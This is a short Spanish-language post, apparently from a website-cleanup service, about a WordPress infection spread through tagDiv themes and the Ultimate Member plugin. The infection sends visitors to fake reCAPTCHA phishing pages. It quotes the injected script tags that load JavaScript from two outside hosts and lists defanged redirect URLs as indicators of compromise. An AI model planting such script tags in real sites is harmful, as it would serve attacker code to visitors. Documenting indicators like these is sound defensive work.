Cada día los casos de infección en WordPress que redirecciona a los visitantes a páginas sospechosas está siendo algo muy común y preocupante. Recientemente, fue descubierta una vulnerabilidad en temas de tagDiv y Plugins de Ultimate Member. En este tipo hackeo WordPress, los visitantes de su página web son redirigidos a páginas phishing o maliciosas.
hxxp utroro.com/xyz or
hxxp://murieh.abc/xyz or
hxxps://unverf.com/xyz
En este hack, los usuarios, cuando se redirige, acaban en urls abusivas con imágenes reCAPTCHA suplantada (pishing). El texto intenta engañar a los visitantes para permitir notificaciones push del navegador.
Por otra parte, Google penaliza a los sitios web que estén en listas negras como sito web phising o hackeados. Los navegadores web mostrarán un mensaje de advertencia a los visitantes cuando visitan su web.
Código malicioso inyectados
El código inyectado en los ficheros php hace referencia a dos sitios
cdn.allyouwant.online. and cdn.eeduelements.com.
El primero fue usando en las últimas infecciones y el segundo desde el comienzo del uso de este tipo de ataque.
... <script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
<script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head> ...
En el momento de escribir esta articulo, hay como unos 3900 sitios web con el script de cdn.eeduelements[.]com y más de 6800 con el script de cdn.allyouwant[.]online.
LIMPIAMOS Y RECUPERAMOS
TU WEB EN 24H
A TU SERVICIO 24X7X365